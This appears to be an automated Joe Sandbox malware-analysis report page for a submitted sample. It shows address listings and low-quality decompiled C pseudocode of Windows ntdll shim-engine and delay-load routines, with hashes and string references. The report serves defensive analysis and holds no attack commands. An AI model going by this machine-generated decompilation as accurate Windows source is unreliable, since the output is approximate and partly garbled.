                                                                            0x1d87f144
                                                                            0x1d87f350
                                                                            0x1d87f350
                                                                            0x1d87f356
                                                                            0x1d87f359
                                                                            0x1d87f378
                                                                            0x1d87f37d
                                                                            0x1d87f35b
                                                                            0x1d87f370
                                                                            0x1d87f375
                                                                            0x1d87f383
                                                                            0x1d87f38e
                                                                            0x00000000
                                                                            0x1d87f14a
                                                                            0x1d87f14a
                                                                            0x1d87f14d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d87f153
                                                                            0x1d87f156
                                                                            0x1d87f15e
                                                                            0x1d87f163
                                                                            0x1d87f16a
                                                                            0x1d87f16a
                                                                            0x1d87f170
                                                                            0x1d87f170
                                                                            0x1d87f177
                                                                            0x1d87f186
                                                                            0x1d87f188
                                                                            0x1d87f18b
                                                                            0x1d87f18f
                                                                            0x1d87f194
                                                                            0x1d87f196
                                                                            0x00000000
                                                                            0x1d87f19c
                                                                            0x1d87f19c
                                                                            0x1d87f19f
                                                                            0x1d87f1a3
                                                                            0x1d87f1ac
                                                                            0x1d87f1ac
                                                                            0x1d87f1ac
                                                                            0x1d87f1ae
                                                                            0x1d87f1b0
                                                                            0x1d87f1b3
                                                                            0x1d87f1b6
                                                                            0x1d87f1bb
                                                                            0x1d87f1c5
                                                                            0x1d87f1c8
                                                                            0x1d87f1ca
                                                                            0x1d87f1cb
                                                                            0x1d87f1cf
                                                                            0x1d87f1cf
                                                                            0x1d87f1c8
                                                                            0x1d87f1d4
                                                                            0x1d87f1d8
                                                                            0x1d87f208
                                                                            0x1d87f20b
                                                                            0x1d87f20e
                                                                            0x1d87f1da
                                                                            0x1d87f1dc
                                                                            0x1d87f1e1
                                                                            0x1d87f1e6
                                                                            0x1d87f1ed
                                                                            0x1d87f1ff
                                                                            0x1d87f1ef
                                                                            0x1d87f1f0
                                                                            0x1d87f1f5
                                                                            0x1d87f1f8
                                                                            0x1d87f1fb
                                                                            0x1d87f1fb
                                                                            0x1d87f202
                                                                            0x1d87f202
                                                                            0x1d87f202
                                                                            0x1d87f211
                                                                            0x1d87f214
                                                                            0x1d87f218
                                                                            0x1d87f21b
                                                                            0x1d87f227
                                                                            0x1d87f22d
                                                                            0x1d87f22d
                                                                            0x1d87f22d
                                                                            0x1d87f22f
                                                                            0x1d87f236
                                                                            0x1d87f238
                                                                            0x1d87f23c
                                                                            0x1d87f23c
                                                                            0x1d87f244
                                                                            0x1d87f24a
                                                                            0x1d87f250
                                                                            0x1d87f2be
                                                                            0x1d87f2c1
                                                                            0x1d87f2c4
                                                                            0x1d87f2c9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d87f2cf
                                                                            0x1d87f2d2
                                                                            0x1d87f2d5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d87f2db
                                                                            0x1d87f2e2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d87f2ec
                                                                            0x1d87f2f3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d87f2f9
                                                                            0x1d87f2ff
                                                                            0x1d87f302
                                                                            0x1d87f321
                                                                            0x1d87f326
                                                                            0x1d87f304
                                                                            0x1d87f319
                                                                            0x1d87f31e
                                                                            0x1d87f337
                                                                            0x1d87f338
                                                                            0x1d87f343
                                                                            0x00000000
                                                                            0x1d87f252
                                                                            0x1d87f252
                                                                            0x1d87f255
                                                                            0x1d87f274
                                                                            0x1d87f279
                                                                            0x1d87f257
                                                                            0x1d87f26c
                                                                            0x1d87f271
                                                                            0x1d87f27f
                                                                            0x1d87f28d
                                                                            0x1d87f295
                                                                            0x1d87f295
                                                                            0x1d87f29b
                                                                            0x1d87f29f
                                                                            0x1d87f2a5
                                                                            0x1d87f2ac
                                                                            0x1d87f2b2
                                                                            0x1d87f2b3
                                                                            0x1d87f2b3
                                                                            0x00000000
                                                                            0x1d87f29f
                                                                            0x1d87f250
                                                                            0x1d87f196
                                                                            0x1d87f0c9
                                                                            0x1d87f0ce
                                                                            0x1d87f0d6
                                                                            0x1d87f0dc
                                                                            0x1d87f3e7
                                                                            0x1d87f3ea
                                                                            0x1d87f3f6
                                                                            0x1d87f3f6

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                            • API String ID: 3446177414-1745908468
                                                                            • Opcode ID: cbeef8f05c629a38f8816311321a324fee4abff850b859db46ce4d388d40490c
                                                                            • Instruction ID: 73196920437d279aa9a587c306c3e17864d3f64ebe1af485a87410147e368457
                                                                            • Opcode Fuzzy Hash: cbeef8f05c629a38f8816311321a324fee4abff850b859db46ce4d388d40490c
                                                                            • Instruction Fuzzy Hash: 95912636908649DFCB02CFA9D840BEDBBF2FF49720F15805AE5459B262C735A941DB12
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7C640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 46%
                                                                            			E1D7C640D(void* __ecx) {
				signed int _v8;
				void* _v12;
				void* _v536;
				void* _v548;
				char _v780;
				char* _v784;
				char _v788;
				char _v792;
				intOrPtr _v804;
				char _v868;
				char* _v872;
				short _v874;
				char _v876;
				void* _v880;
				char _v892;
				void* _v896;
				void* _v900;
				void* _v904;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t48;
				short _t49;
				void* _t52;
				signed char _t61;
				void* _t67;
				intOrPtr _t71;
				void* _t81;
				signed char _t85;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				void* _t109;

				_t108 = (_t106 & 0xfffffff8) - 0x374;
				_v8 =  *0x1d8cb370 ^ _t108;
				_t48 = 0x16;
				_v876 = _t48;
				_t96 =  &_v876;
				_t49 = 0x18;
				_v874 = _t49;
				_t99 = __ecx;
				_v872 = L"apphelp.dll";
				_v784 =  &_v780;
				_v788 = 0x1000000;
				_v780 = 0;
				_t52 = E1D7C6C11( &_v788,  &_v876, _t109);
				if(_t52 < 0) {
					_t85 =  *0x1d8c37c0; // 0x0
					__eflags = _t85 & 0x00000003;
					if((_t85 & 0x00000003) == 0) {
						L12:
						__eflags = _t85 & 0x00000010;
						L15:
						if(__eflags != 0) {
							asm("int3");
						}
						L6:
						_t53 =  &_v780;
						if( &_v780 != _v784) {
							_t53 = E1D7CBA80(_v784);
						}
						_pop(_t100);
						_pop(_t102);
						_pop(_t81);
						return E1D814B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
					}
					_push(_t52);
					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
					_push(0);
					_push("LdrpInitShimEngine");
					_push(0xa35);
					L11:
					_push("minkernel\\ntdll\\ldrinit.c");
					E1D84E692();
					_t85 =  *0x1d8c37c0; // 0x0
					_t108 = _t108 + 0x18;
					goto L12;
				}
				E1D7EE8A6(0, 0x4001,  &_v868);
				_t96 =  &_v872;
				_t103 = E1D7C6B45( &_v792,  &_v872, 0,  &_v892);
				if(_v804 != 0) {
					E1D7FE7E0( &_v792, _v868);
				}
				_t112 = _t103;
				if(_t103 < 0) {
					_t61 =  *0x1d8c37c0; // 0x0
					__eflags = _t61 & 0x00000003;
					if((_t61 & 0x00000003) != 0) {
						E1D84E692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
						_t61 =  *0x1d8c37c0; // 0x0
						_t108 = _t108 + 0x18;
					}
					__eflags = _t61 & 0x00000010;
					goto L15;
				} else {
					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
					 *0x1d8c5d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
					E1D807DF6( *((intOrPtr*)(_t108 + 0xc)));
					E1D7ED3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
					_t67 = E1D7C6868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
					if(_t67 < 0) {
						_t85 =  *0x1d8c37c0; // 0x0
						__eflags = _t85 & 0x00000003;
						if((_t85 & 0x00000003) == 0) {
							goto L12;
						}
						_push(_t67);
						_push("Getting the shim engine exports failed with status 0x%08lx\n");
						_push(0);
						_push("LdrpInitShimEngine");
						_push(0xa56);
						goto L11;
					}
					_t104 =  *0x1d8c9208; // 0x0
					_v872 = _t108 + 0x178;
					_v876 = 0x2000000;
					_t96 =  *0x7ffe0330;
					_t71 =  *0x1d8c5b24; // 0x1932c18
					asm("ror esi, cl");
					 *0x1d8c91e0( &_v876, _t71 + 0x24, _t99, 0x20);
					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
						E1D7C6565( *((intOrPtr*)(_t108 + 0x14)));
						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
						}
					}
					goto L6;
				}
			}









































                                                                            0x1d7c6415
                                                                            0x1d7c6422
                                                                            0x1d7c642e
                                                                            0x1d7c642f
                                                                            0x1d7c6434
                                                                            0x1d7c643a
                                                                            0x1d7c643b
                                                                            0x1d7c6440
                                                                            0x1d7c6446
                                                                            0x1d7c644e
                                                                            0x1d7c6458
                                                                            0x1d7c6460
                                                                            0x1d7c6465
                                                                            0x1d7c646c
                                                                            0x1d829770
                                                                            0x1d829776
                                                                            0x1d829779
                                                                            0x1d8297b3
                                                                            0x1d8297b3
                                                                            0x1d8297dd
                                                                            0x1d8297dd
                                                                            0x1d8297e3
                                                                            0x1d8297e3
                                                                            0x1d7c6542
                                                                            0x1d7c6542
                                                                            0x1d7c654a
                                                                            0x1d82982b
                                                                            0x1d82982b
                                                                            0x1d7c6557
                                                                            0x1d7c6558
                                                                            0x1d7c6559
                                                                            0x1d7c6564
                                                                            0x1d7c6564
                                                                            0x1d82977b
                                                                            0x1d82977c
                                                                            0x1d829781
                                                                            0x1d829783
                                                                            0x1d829788
                                                                            0x1d8297a0
                                                                            0x1d8297a0
                                                                            0x1d8297a5
                                                                            0x1d8297aa
                                                                            0x1d8297b0
                                                                            0x00000000
                                                                            0x1d8297b0
                                                                            0x1d7c647e
                                                                            0x1d7c648b
                                                                            0x1d7c6498
                                                                            0x1d7c649e
                                                                            0x1d8297ed
                                                                            0x1d8297ed
                                                                            0x1d7c64a4
                                                                            0x1d7c64a6
                                                                            0x1d8297f7
                                                                            0x1d8297fc
                                                                            0x1d8297fe
                                                                            0x1d8297ce
                                                                            0x1d8297d3
                                                                            0x1d8297d8
                                                                            0x1d8297d8
                                                                            0x1d8297db
                                                                            0x00000000
                                                                            0x1d7c64ac
                                                                            0x1d7c64b0
                                                                            0x1d7c64be
                                                                            0x1d7c64c3
                                                                            0x1d7c64cc
                                                                            0x1d7c64d1
                                                                            0x1d7c64d8
                                                                            0x1d829802
                                                                            0x1d829808
                                                                            0x1d82980b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d82978f
                                                                            0x1d829790
                                                                            0x1d829795
                                                                            0x1d829796
                                                                            0x1d82979b
                                                                            0x00000000
                                                                            0x1d82979b
                                                                            0x1d7c64de
                                                                            0x1d7c64eb
                                                                            0x1d7c64f1
                                                                            0x1d7c64f9
                                                                            0x1d7c6507
                                                                            0x1d7c6510
                                                                            0x1d7c651c
                                                                            0x1d7c6526
                                                                            0x1d7c652c
                                                                            0x1d7c653c
                                                                            0x1d82981d
                                                                            0x1d82981d
                                                                            0x1d7c653c
                                                                            0x00000000
                                                                            0x1d7c6526

                                                                            APIs
                                                                            • RtlDebugPrintTimes.NTDLL ref: 1D7C651C
                                                                              • Part of subcall function 1D7C6565: RtlDebugPrintTimes.NTDLL ref: 1D7C6614
                                                                              • Part of subcall function 1D7C6565: RtlDebugPrintTimes.NTDLL ref: 1D7C665F
                                                                            Strings
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1D8297A0, 1D8297C9
                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1D8297B9
                                                                            • LdrpInitShimEngine, xrefs: 1D829783, 1D829796, 1D8297BF
                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1D82977C
                                                                            • apphelp.dll, xrefs: 1D7C6446
                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1D829790
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-204845295
                                                                            • Opcode ID: 55a2fd3377bd624e197cb2f417b4219a4bcbf191e9c1511424a5affacd71a525
                                                                            • Instruction ID: 2ca8c70b25f997e2c5bc56d39329461143c7a7c8dd24b5d896700408dd90b78a
                                                                            • Opcode Fuzzy Hash: 55a2fd3377bd624e197cb2f417b4219a4bcbf191e9c1511424a5affacd71a525
                                                                            • Instruction Fuzzy Hash: 1151EDB0248301DFD310DF24D8D4BAA77E8FF847A4F50492AF6959B1A0DA30EA40CB93
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D84FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 17%
                                                                            			E1D84FA02(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _v8;
				intOrPtr _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				signed char _t50;
				intOrPtr _t51;
				intOrPtr _t66;
				intOrPtr _t68;
				char* _t71;
				void* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				char* _t77;

				_t74 = __edx;
				_v20 = __ecx;
				_t66 = 0;
				_v12 =  *((intOrPtr*)(__ecx + 0x18)) +  *((intOrPtr*)(_a4 + 4));
				E1D84F899(__ecx, _a4, _a16,  &_v16,  &_v8);
				_t50 =  *0x1d8c37c0; // 0x0
				_t77 = _v16;
				if((_t50 & 0x00000003) != 0) {
					_t71 = _t77;
					if(_t77 == 0) {
						_t71 = "Unknown";
					}
					_push(_a20);
					_push(_v20 + 0x2c);
					_push(_v8);
					_push(_t71);
					E1D84E692("minkernel\\ntdll\\ldrdload.c", 0x1cc, "LdrpRedirectDelayloadFailure", _t66, "Failed to find export %s!%s (Ordinal:%d) in \"%wZ\"  0x%08lx\n", _v12);
					_t50 =  *0x1d8c37c0; // 0x0
				}
				if((_t50 & 0x00000010) != 0) {
					asm("int3");
				}
				if(_t74 == 0) {
					_t68 = _t66;
					goto L11;
				} else {
					_t68 =  *((intOrPtr*)(_t74 + 0x18));
					if(( *0x1d8c391c & 0x00000010) != 0 || ( *(_t74 + 0x34) & 0x00000001) != 0) {
						L11:
						_t51 = 1;
						goto L12;
					} else {
						_t51 = _t66;
						L12:
						_t75 = _a8;
						if(_t75 == 0 || _t51 == 0) {
							L18:
							_t76 = _a12;
							if(_t76 != 0) {
								if(_t77 == 0) {
									_t77 = _v8;
								}
								 *0x1d8c91e0(_v12, _t77);
								_t66 =  *_t76();
							}
							goto L22;
						} else {
							_v52 = _a4;
							_v48 = _a16;
							_v28 = _t66;
							_v56 = 0x24;
							_v44 = _v12;
							_v32 = _t68;
							_v24 = E1D806010(_a20);
							if(_t77 == 0) {
								_v40 = _t66;
								_v36 = _v8;
							} else {
								_v40 = 1;
								_v36 = _t77;
							}
							 *0x1d8c91e0(4,  &_v56);
							_t66 =  *_t75();
							if(_t66 != 0) {
								L22:
								return _t66;
							} else {
								goto L18;
							}
						}
					}
				}
			}

























                                                                            0x1d84fa10
                                                                            0x1d84fa12
                                                                            0x1d84fa18
                                                                            0x1d84fa1d
                                                                            0x1d84fa2b
                                                                            0x1d84fa30
                                                                            0x1d84fa35
                                                                            0x1d84fa3a
                                                                            0x1d84fa3c
                                                                            0x1d84fa40
                                                                            0x1d84fa42
                                                                            0x1d84fa42
                                                                            0x1d84fa47
                                                                            0x1d84fa50
                                                                            0x1d84fa51
                                                                            0x1d84fa54
                                                                            0x1d84fa6d
                                                                            0x1d84fa72
                                                                            0x1d84fa77
                                                                            0x1d84fa7c
                                                                            0x1d84fa7e
                                                                            0x1d84fa7e
                                                                            0x1d84fa81
                                                                            0x1d84fa99
                                                                            0x00000000
                                                                            0x1d84fa83
                                                                            0x1d84fa8a
                                                                            0x1d84fa8d
                                                                            0x1d84fa9b
                                                                            0x1d84fa9b
                                                                            0x00000000
                                                                            0x1d84fa95
                                                                            0x1d84fa95
                                                                            0x1d84fa9d
                                                                            0x1d84fa9d
                                                                            0x1d84faa2
                                                                            0x1d84fb01
                                                                            0x1d84fb01
                                                                            0x1d84fb06
                                                                            0x1d84fb0a
                                                                            0x1d84fb0c
                                                                            0x1d84fb0c
                                                                            0x1d84fb15
                                                                            0x1d84fb1d
                                                                            0x1d84fb1d
                                                                            0x00000000
                                                                            0x1d84faa8
                                                                            0x1d84faae
                                                                            0x1d84fab4
                                                                            0x1d84faba
                                                                            0x1d84fabd
                                                                            0x1d84fac4
                                                                            0x1d84fac7
                                                                            0x1d84facf
                                                                            0x1d84fad4
                                                                            0x1d84fae5
                                                                            0x1d84fae8
                                                                            0x1d84fad6
                                                                            0x1d84fad6
                                                                            0x1d84fadd
                                                                            0x1d84fadd
                                                                            0x1d84faf3
                                                                            0x1d84fafb
                                                                            0x1d84faff
                                                                            0x1d84fb21
                                                                            0x1d84fb25
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d84faff
                                                                            0x1d84faa2
                                                                            0x1d84fa8d

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                            • API String ID: 3446177414-4227709934
                                                                            • Opcode ID: 050dc392b25fc037ae83eb526a9d8a24988ef75641a3d8c8cdbb1ed0ae7ba3ad
                                                                            • Instruction ID: 8e81f3d5fe0ab918a723feabb34e71aa3ffcf89d7628c5b91d5a12467751c57d
                                                                            • Opcode Fuzzy Hash: 050dc392b25fc037ae83eb526a9d8a24988ef75641a3d8c8cdbb1ed0ae7ba3ad
                                                                            • Instruction Fuzzy Hash: 62415276A0121DAFCB01DF99C988BEEBBB5FF88358F218159F904A7340D7719A01CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7C6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 59%
                                                                            			E1D7C6565(intOrPtr* __ecx) {
				signed int _v8;
				char _v16;
				char _v92;
				char _v93;
				char _v100;
				signed short _v106;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t56;
				signed char _t67;
				intOrPtr _t76;
				signed char _t81;
				signed int _t86;
				signed int _t87;
				char _t88;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr* _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t113;
				signed int _t114;
				intOrPtr* _t116;
				signed int _t117;
				void* _t118;

				_v8 =  *0x1d8cb370 ^ _t117;
				_v93 = 1;
				_t110 = __ecx;
				E1D7EE8A6(0, 0x4001,  &_v92);
				_t106 =  *0x7ffe0330;
				_t86 =  *0x1d8c9200; // 0x0
				_t113 = 0x20;
				 *0x1d8c65f8 = 1;
				_t92 = _t113 - (_t106 & 0x0000001f);
				asm("ror ebx, cl");
				_t87 = _t86 ^ _t106;
				if( *__ecx == 0) {
					L8:
					_t88 = _v93;
					L9:
					if(_v16 != 0) {
						E1D7FE7E0(_t92, _v92);
					}
					_t114 =  *0x1d8c9210; // 0x0
					asm("ror esi, cl");
					 *0x1d8c91e0();
					 *(_t114 ^  *0x7ffe0330)();
					_t108 =  *0x7ffe0330;
					_t111 =  *0x1d8c9218; // 0x0
					_push(0x20);
					asm("ror edi, cl");
					_t112 = _t111 ^  *0x7ffe0330;
					E1D7DFED0(0x1d8c32d8);
					_t98 = 0x1d8c5d8c;
					if( *0x1d8c65f0 != 0) {
						_t56 =  *0x1d8c5d8c; // 0x1932c18
						while(1) {
							__eflags = _t56 - _t98;
							if(_t56 == _t98) {
								break;
							}
							_v100 = _t56;
							_t39 = _t56 + 0x35;
							 *_t39 =  *(_t56 + 0x35) & 0x000000f7;
							__eflags =  *_t39;
							_t56 =  *_t56;
						}
						goto L11;
					} else {
						L11:
						_t116 =  *0x1d8c5d8c; // 0x1932c18
						if( *0x1d8c65f4 < 2) {
							_t116 =  *_t116;
						}
						if(_t116 == _t98) {
							L15:
							 *0x1d8c65f0 = 1;
							 *0x1d8c65f8 = 0;
							E1D7DE740(_t98);
							E1D7C676F(_t98);
							return E1D814B50(_t88, _t88, _v8 ^ _t117, _t108, _t112, _t116, 0x1d8c32d8);
						} else {
							do {
								_v100 = _t116;
								_t108 = _t112;
								_t24 = _t116 + 0x50; // 0x1932be0
								_t98 =  *_t24;
								E1D7C6704( *_t24, _t112);
								_t116 =  *_t116;
							} while (_t116 != 0x1d8c5d8c);
							goto L15;
						}
					}
				} else {
					goto L1;
				}
				do {
					L1:
					E1D815050(_t92,  &_v108, _t110);
					_t92 = E1D7C6B45( &_v108,  &_v92, 1,  &_v100);
					if(_t92 < 0) {
						_t67 =  *0x1d8c37c0; // 0x0
						__eflags = _t67 & 0x00000003;
						if((_t67 & 0x00000003) != 0) {
							_push(_t92);
							E1D84E692("minkernel\\ntdll\\ldrinit.c", 0x8ef, "LdrpLoadShimEngine", 0, "Loading the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t67 =  *0x1d8c37c0; // 0x0
							_t118 = _t118 + 0x1c;
						}
						__eflags = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							asm("int3");
						}
						_v93 = 0;
						goto L6;
					}
					 *(_v100 + 0x34) =  *(_v100 + 0x34) | 0x00000100;
					E1D807DF6(_v100);
					_t76 = _v100;
					_t103 =  *((intOrPtr*)(_t76 + 0x50));
					_t122 =  *((intOrPtr*)(_t103 + 0x20)) - 7;
					if( *((intOrPtr*)(_t103 + 0x20)) != 7) {
						L5:
						 *0x1d8c91e0( *((intOrPtr*)(_t76 + 0x18)));
						 *_t87();
						_t92 = _v100;
						E1D7ED3E1(_t87, _v100, _t113);
						goto L6;
					}
					_t113 = E1D7F16EE(_t87, _t103, _t110, _t113, _t122);
					if(_t113 < 0) {
						_t81 =  *0x1d8c37c0; // 0x0
						_t88 = 0;
						__eflags = _t81 & 0x00000003;
						if((_t81 & 0x00000003) != 0) {
							_push(_t113);
							E1D84E692("minkernel\\ntdll\\ldrinit.c", 0x909, "LdrpLoadShimEngine", 0, "Initializing the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t81 =  *0x1d8c37c0; // 0x0
						}
						__eflags = _t81 & 0x00000010;
						if((_t81 & 0x00000010) != 0) {
							asm("int3");
						}
						_t92 = _t113;
						E1D851D5E(_t113);
						_push(_t113);
						_push(0xffffffff);
						E1D812C70();
						_t113 = 0x20;
						goto L9;
					}
					_t76 = _v100;
					goto L5;
					L6:
					_t110 = _t110 + ((_v106 & 0x0000ffff) >> 1) * 2;
				} while ( *_t110 != 0);
				_t113 = 0x20;
				goto L8;
			}































                                                                            0x1d7c6574
                                                                            0x1d7c657d
                                                                            0x1d7c6581
                                                                            0x1d7c658b
                                                                            0x1d7c6590
                                                                            0x1d7c6598
                                                                            0x1d7c65a3
                                                                            0x1d7c65a6
                                                                            0x1d7c65ad
                                                                            0x1d7c65b1
                                                                            0x1d7c65b3
                                                                            0x1d7c65b8
                                                                            0x1d7c6637
                                                                            0x1d7c6637
                                                                            0x1d7c663a
                                                                            0x1d7c663e
                                                                            0x1d7c66fa
                                                                            0x1d7c66fa
                                                                            0x1d7c664c
                                                                            0x1d7c6659
                                                                            0x1d7c665f
                                                                            0x1d7c6665
                                                                            0x1d7c6667
                                                                            0x1d7c666f
                                                                            0x1d7c6678
                                                                            0x1d7c667d
                                                                            0x1d7c6684
                                                                            0x1d7c6686
                                                                            0x1d7c6692
                                                                            0x1d7c6697
                                                                            0x1d8298c3
                                                                            0x1d8298d3
                                                                            0x1d8298d3
                                                                            0x1d8298d5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8298ca
                                                                            0x1d8298cd
                                                                            0x1d8298cd
                                                                            0x1d8298cd
                                                                            0x1d8298d1
                                                                            0x1d8298d1
                                                                            0x00000000
                                                                            0x1d7c669d
                                                                            0x1d7c669d
                                                                            0x1d7c66a4
                                                                            0x1d7c66aa
                                                                            0x1d7c66ac
                                                                            0x1d7c66ac
                                                                            0x1d7c66b0
                                                                            0x1d7c66c9
                                                                            0x1d7c66cb
                                                                            0x1d7c66d7
                                                                            0x1d7c66dc
                                                                            0x1d7c66e1
                                                                            0x1d7c66f6
                                                                            0x1d7c66b2
                                                                            0x1d7c66b2
                                                                            0x1d7c66b2
                                                                            0x1d7c66b5
                                                                            0x1d7c66b7
                                                                            0x1d7c66b7
                                                                            0x1d7c66ba
                                                                            0x1d7c66bf
                                                                            0x1d7c66c1
                                                                            0x00000000
                                                                            0x1d7c66b2
                                                                            0x1d7c66b0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7c65ba
                                                                            0x1d7c65ba
                                                                            0x1d7c65bf
                                                                            0x1d7c65d5
                                                                            0x1d7c65d9
                                                                            0x1d829835
                                                                            0x1d82983a
                                                                            0x1d82983c
                                                                            0x1d82983e
                                                                            0x1d829859
                                                                            0x1d82985e
                                                                            0x1d829863
                                                                            0x1d829863
                                                                            0x1d829866
                                                                            0x1d829868
                                                                            0x1d82986a
                                                                            0x1d82986a
                                                                            0x1d82986d
                                                                            0x00000000
                                                                            0x1d82986d
                                                                            0x1d7c65e2
                                                                            0x1d7c65ec
                                                                            0x1d7c65f1
                                                                            0x1d7c65f4
                                                                            0x1d7c65f7
                                                                            0x1d7c65fb
                                                                            0x1d7c660f
                                                                            0x1d7c6614
                                                                            0x1d7c661a
                                                                            0x1d7c661c
                                                                            0x1d7c661f
                                                                            0x00000000
                                                                            0x1d7c661f
                                                                            0x1d7c6602
                                                                            0x1d7c6606
                                                                            0x1d829875
                                                                            0x1d82987a
                                                                            0x1d82987c
                                                                            0x1d82987e
                                                                            0x1d829880
                                                                            0x1d82989a
                                                                            0x1d82989f
                                                                            0x1d8298a4
                                                                            0x1d8298a7
                                                                            0x1d8298a9
                                                                            0x1d8298ab
                                                                            0x1d8298ab
                                                                            0x1d8298ac
                                                                            0x1d8298ae
                                                                            0x1d8298b3
                                                                            0x1d8298b4
                                                                            0x1d8298b6
                                                                            0x1d8298bd
                                                                            0x00000000
                                                                            0x1d8298bd
                                                                            0x1d7c660c
                                                                            0x00000000
                                                                            0x1d7c6624
                                                                            0x1d7c662a
                                                                            0x1d7c662f
                                                                            0x1d7c6636
                                                                            0x00000000

                                                                            APIs
                                                                            Strings
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1D829854, 1D829895
                                                                            • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1D829885
                                                                            • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1D829843
                                                                            • LdrpLoadShimEngine, xrefs: 1D82984A, 1D82988B
                                                                            Memory Dump Source
